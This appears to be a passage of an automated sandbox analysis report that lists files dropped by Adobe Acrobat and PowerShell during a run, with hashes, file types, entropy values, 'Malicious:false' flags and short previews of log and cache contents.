                        Preview:2023/10/06-15:30:12.692 17c8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2023/10/06-15:30:12.693 17c8 Recovering log #3.2023/10/06-15:30:12.694 17c8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                        Download File
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):326
                        Entropy (8bit):5.228348841997223
                        Encrypted:false
                        SSDEEP:6:kw83cQ+q2PCHhJ2nKuAl9OmbzNMxIFUtZ83cCKXZmwj83cmNVkwOCHhJ2nKuAl9c:kv3cVvBHAa8jFUtC3cCKX/o3cu56HAab
                        MD5:B855BA5629E9844F22DFDF9771613E9A
                        SHA1:98C3343681CC7048C5C3B101F33664790E1A1A80
                        SHA-256:4B48E7D66FFDBE5BD43D9FFD5A90B22B86E7CCD3507630FD43DF9504192D69C3
                        SHA-512:6D52087EB945BB244B30B2E87A0B5EF2F9C6317DCF05D2C97CD859402968CA1B9A2EB2BE9B9F61AF861334C6E95A9CAB2382E551C2FEA7B99F4E44EDE1421C5D
                        Malicious:false
                        Preview:2023/10/06-15:30:12.692 17c8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2023/10/06-15:30:12.693 17c8 Recovering log #3.2023/10/06-15:30:12.694 17c8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                        C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-231006133016Z-154.bmp

                        Download File
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                        Category:dropped
                        Size (bytes):65110
                        Entropy (8bit):0.48635237317427504
                        Encrypted:false
                        SSDEEP:96:0WMT6IMM7MMXEMDiMmMMMMmgEMLBMMl+RME4vdMedH1XrJMMkAMM7MPMXEMMIM7m:hXoi
                        MD5:A0F86A5B7FA5F39CDE2976A38F97E73C
                        SHA1:1A7B07C75E74F69999AE931CEB27F50495EB1617
                        SHA-256:BF5F8C4110B4EECFDED26441BACB7C186AAE9E36676B2814E442ABCA18D69BE3
                        SHA-512:5D2E9159D574FD858F7C028863F4619B792EECC6D30CC1B6245722D22917D45F266ED672DE7710198A4F6E036C767BF42B15E142BB93A0C0FC56A234CA720C65
                        Malicious:false
                        Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                        Download File
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):2818
                        Entropy (8bit):5.135790972452514
                        Encrypted:false
                        SSDEEP:48:Y392PRnkGM9iL2GBo+cIYH8TFSGTFXwiTFgCTF3bTFDL0ToT3UTpNMaTpTqt:Lmi2ZhoJLWNMF
                        MD5:CB52A0592156CFC8E760FED0EF27424C
                        SHA1:91D66431DB015B2B98E7A3E59FE1EE70D699E82F
                        SHA-256:D88CD4196D0C6A7CBDAA22C1D82AB07AC2B8593EF222E76C6B04845670F23A6F
                        SHA-512:3F01885E9119900780D1E7FE84FD465318C08393288CC42488957AFBBB1880CFAE2F56CE95BFF86646790D9A3EF8E0611B3EF274F5434FB622F6748D9F8B64D9
                        Malicious:false
                        Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"1a6c845034c91b8f895804fd80befd78","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696599016000},{"id":"DC_Reader_Upsell_Cards","info":{"dg":"2ca0b88a5bc53890610b00eac8c57ce9","sid":"DC_Reader_Upsell_Cards"},"mimeType":"file","size":5220,"ts":1696599015000},{"id":"ACROBAT_READER_MASTER_SURFACEID","info":{"dg":"957fa9d2cf63e4c067ef7c9e4a53f7ae","sid":"ACROBAT_READER_MASTER_SURFACEID"},"mimeType":"file","size":295,"ts":1696599015000},{"id":"DC_READER_LAUNCH_CARD","info":{"dg":"687283e6717694573802efbe731a3a4f","sid":"DC_READER_LAUNCH_CARD"},"mimeType":"file","size":285,"ts":1696599015000},{"id":"DC_FirstMile_Home_View_Surface","info":{"dg":"5560557b9a764cced788f1f77c329767","sid":"DC_FirstMile_Home_View_Surface"},"mimeType":"file","size":294,"ts":1696599015000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"1f627a0ebb1619d115b1670685dc36d6","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size

                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                        Download File
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                        Category:dropped
                        Size (bytes):12288
                        Entropy (8bit):1.3177303870386765
                        Encrypted:false
                        SSDEEP:24:TLKufx/XYKQvGJF7urs9Ohn07oz7oF0Hl0FopUEiP66UEiPbnPnNknNMeJ2tqVpq:TGufl2GL7ms9WR1CPmPbPahJIypilI3O
                        MD5:E5EEEC49827599EB7829B8E5C02E0C2B
                        SHA1:28244CB502F5107DDE6F08FA15C08D0B4493A23C
                        SHA-256:256208414725D0E3C9DA21B02FFECAF37419472EF436DE870F4A6A39A5456E1B
                        SHA-512:AD513738490D30832C6DDB818E909EEEF6AE95379DEBAF4128325CA258D31A87D7D8B68702FB32D03B573C186B31336258783AD6F4CEB294E8C874ABC7ADB11E
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                        Download File
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:SQLite Rollback Journal
                        Category:dropped
                        Size (bytes):8720
                        Entropy (8bit):1.7804664584116694
                        Encrypted:false
                        SSDEEP:24:7+tAlhn07oz7oF0Hl0FopUEiP66UEiPbnPnNknNMeJ24qVpaVrScVr0InzqLhx/p:7MnWR1CPmPbPahJ9ypilISqFl2GL7ms7
                        MD5:EE3ABF60E3C9F89FA1762DEC78927672
                        SHA1:D3473FC31B0FE8A5932CA54F56ADA02546715314
                        SHA-256:1BD4313973D83286C78C0D46BDB9D251A9825026F08D8BFE5A5FE25AB9347C82
                        SHA-512:A123BA4FBF6E45FD17A6DD810ED43863FAA3A8A04564A9609814D7445E21609FA59AF5AAC90A5B8B4A44A7CF5A49EF0FC58A5D33D593110AF7E8FFB308A5BFA1
                        Malicious:false
                        Preview:.... .c.....M.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.p.p.p.p.p.p.p.p.p.p..........................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1368
                        Entropy (8bit):5.3881970764721006
                        Encrypted:false
                        SSDEEP:24:3IWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9tXt/NK3R88bJ0G9rm:YWSU4y4RQmFoUeWmfmZ9tlNWR83+q
                        MD5:0EA6238BFA66E898D3A7316F8C3AC955
                        SHA1:358497BEDDC4FA7DD3FE421FF7A5BF36ED1EB9FB
                        SHA-256:83C58288F2804B5A137D4199D23E20D0D75F5491B4672965F06C37132E054F65
                        SHA-512:58D3A9A43A234DAF33846F98AEA1CC5AB81C3994A9EA4BD7BAFC0279A48137144A5468F3518A357669426DD8C1EDC39481692B0BE4D31471ED4D46B58A3C1D0B
                        Malicious:false
                        Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):1.1197707563435464
                        Encrypted:false
                        SSDEEP:3:NlllulIXh:NllUI
                        MD5:EBD34E1A339DB85BCC60A3CC2075E978
                        SHA1:207016FCE09F682F8652522FA1FEAA677B4169FE
                        SHA-256:FDD52D6F5ACD1769789173B80841CB3EE5819C139DD245A1AF8757E0B226D7F0
                        SHA-512:7D5A684D6022EEA8213EA42B7CF36C83547794F7227498DBB2FFC2D9A35E656CFD27D371DC8D072F106263AB289F8729032551C013497047EC532067561C49AC
                        Malicious:false
                        Preview:@...e................................................@..........

                        C:\Users\user\AppData\Local\Temp\MSI7c3d5.LOG

                        Download File
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):246
                        Entropy (8bit):3.511206980872271
                        Encrypted:false
                        SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8VO0lX4d0lH:Qw946cPbiOxDlbYnuRKkLlb9
                        MD5:0275A84F9157CDB436E949773B6FD11B
                        SHA1:B015562FAD289E5DB6646D0610D82093453077FF
                        SHA-256:7EDDD25C60CC1B79633A25282504675095AF6C16685565D78ED2FB5A1AF816B9
                        SHA-512:A00447435A9FC4718749CC06E7EAE2930759FC0568BFF54FF598FF8AA0394B71B1000A00E0FDB54C95B4F633CC9FCFF07973B9121194F62FE5C0C5FCC0949D1A
                        Malicious:false
                        Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.6./.1.0./.2.0.2.3. . .1.5.:.3.0.:.2.1. .=.=.=.....

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_101necc0.gfn.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fn5sjsr4.wf1.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i3lytaop.mgy.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lhzsowrx.evd.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mrkvx0s3.mxk.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yzagccmo.ije.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2023-10-06 15-30-15-161.log

                        Download File
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:ASCII text, with very long lines (393)
                        Category:dropped
                        Size (bytes):16525
                        Entropy (8bit):5.33860678500249
                        Encrypted:false
                        SSDEEP:384:IC2heaVGJMUPhP80d0Wc+9eG/CCihFomva7RVRkfKhZmWWyC7rjgNgXo6ge5iaW0:X8B
                        MD5:C3FEDB046D1699616E22C50131AAF109
                        SHA1:C9EEA5A1A16BD2CD8154E8C308C8A336E990CA8D
                        SHA-256:EA948BAC75D609B74084113392C9F0615D447B7F4AACA78D818205503EACC3FD
                        SHA-512:845CDB5166B35B39215A051144452BEF9161FFD735B3F8BD232FB9A7588BA016F7939D91B62E27D6728686DFA181EFC3F3CC9954B2EDAB7FC73FCCE850915185
                        Malicious:false
                        Preview:SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:080+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig:

                        C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                        Download File
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:ASCII text, with very long lines (393), with CRLF line terminators
                        Category:dropped
                        Size (bytes):15114
                        Entropy (8bit):5.379647096822197
                        Encrypted:false
                        SSDEEP:384:2UQxYMNAZCKjaCFxvUlNSBiWX3g9Ek+t+tRTr7GbKuQtot+trtFtntktivtSvS/Z:LeKkpbde4R
                        MD5:6128672A35D0C505159B187E67ED1C9A
                        SHA1:01CF74CF4F22DC48E98288E87181936160D15860
                        SHA-256:9DB552A3CD4200C902E715DE2B8337C09A59621907F83A1EB98CF34955B2A1F8
                        SHA-512:B5DB13AE57934C539B32F42891EF9EC21D35AF82B2102757B1358503658457072D77B0B7733CC2B6A5BC627B5BE5B7A847113265A3F5C101CCEC459E5B96C8D6
                        Malicious:false
                        Preview:SessionID=50aff62b-437f-468b-89d4-ec0f004e3653.1696599015185 Timestamp=2023-10-06T15:30:15:185+0200 ThreadID=7264 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=50aff62b-437f-468b-89d4-ec0f004e3653.1696599015185 Timestamp=2023-10-06T15:30:15:187+0200 ThreadID=7264 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=50aff62b-437f-468b-89d4-ec0f004e3653.1696599015185 Timestamp=2023-10-06T15:30:15:187+0200 ThreadID=7264 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=50aff62b-437f-468b-89d4-ec0f004e3653.1696599015185 Timestamp=2023-10-06T15:30:15:187+0200 ThreadID=7264 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=50aff62b-437f-468b-89d4-ec0f004e3653.1696599015185 Timestamp=2023-10-06T15:30:15:187+0200 ThreadID=7264 Component=ngl-lib_NglAppLib Description="SetConf

                        C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                        Download File
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):29752
                        Entropy (8bit):5.409662602911639
                        Encrypted:false
                        SSDEEP:192:TcbeIewcbVcbqI4ucbrcbQIrJcb6cbCIC4cbdcbuIQ+cbt:ceo4+rsCcQ5
                        MD5:38F3C1B6075401D74069368E67667052
                        SHA1:FCE5B360041C881C28DBABD94781AEEA6AA73BB9
                        SHA-256:F58001F3A623729229E4174495113068F19EFA5BB192DBE7A8AEB0694ACDC2C8
                        SHA-512:F456E56A6F8981790E380C804E44F158F164273FE25195E8A971465BFF5A00A69D20046B46BEE820A47B1D1917A48C9BA988018D04462B70007171E7B1303B7A
                        Malicious:false
                        Preview:05-10-2023 10:18:29:.---2---..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 10:18:29:.Closing File..05-10-

                        C:\Users\user\AppData\Local\Temp\acrocef_low\376886d2-da80-445c-8620-e126e0b4999f.tmp

                        Download File
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                        Category:dropped
                        Size (bytes):386528
                        Entropy (8bit):7.9736851559892425
                        Encrypted:false
                        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                        Malicious:false
                        Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                        C:\Users\user\AppData\Local\Temp\acrocef_low\74ed404b-1b8e-428c-9a26-05aa9876489b.tmp

                        Download File
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                        Category:dropped
                        Size (bytes):1407294
                        Entropy (8bit):7.97605879016224
                        Encrypted:false
                        SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                        MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                        SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                        SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                        SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                        Malicious:false
                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                        C:\Users\user\AppData\Local\Temp\acrocef_low\ed893c29-98f4-4e79-85de-cda9da65281a.tmp

                        Download File
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                        Category:dropped
                        Size (bytes):758601
                        Entropy (8bit):7.98639316555857
                        Encrypted:false
                        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                        MD5:3A49135134665364308390AC398006F1
                        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                        Malicious:false
                        Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                        C:\Users\user\Research.pdf

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
